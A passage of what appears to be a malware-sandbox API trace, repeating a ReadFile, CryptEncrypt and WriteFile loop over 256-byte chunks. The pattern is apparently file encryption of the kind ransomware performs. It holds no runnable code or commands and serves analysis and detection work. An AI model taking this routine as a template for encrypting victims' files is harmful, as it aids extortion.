pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.213] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.213] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.213] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.213] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.213] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.214] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.214] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.214] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.214] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.214] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.214] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.214] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.214] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.214] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.214] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.214] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.214] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.214] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.214] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.214] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.214] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.214] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.214] GetLastError () returned 0x0 [0168.214] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.215] GetLastError () returned 0x0 [0168.215] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.215] GetLastError () returned 0x0 [0168.215] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.215] GetLastError () returned 0x0 [0168.215] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.215] GetLastError () returned 0x0 [0168.215] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.215] GetLastError () returned 0x0 [0168.215] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.215] GetLastError () returned 0x0 [0168.215] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.215] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.215] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.216] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.216] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.216] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.216] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.216] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.216] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.216] GetLastError () returned 0x0 [0168.216] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.216] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.217] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.217] GetLastError () returned 0x0 [0168.217] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.217] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.217] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.217] GetLastError () returned 0x0 [0168.217] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.217] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.217] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.217] GetLastError () returned 0x0 [0168.217] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.217] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.217] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.217] GetLastError () returned 0x0 [0168.217] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.217] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.217] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.217] GetLastError () returned 0x0 [0168.217] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.217] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.217] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.217] GetLastError () returned 0x0 [0168.217] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.217] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.218] GetLastError () returned 0x0 [0168.218] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.218] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.218] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 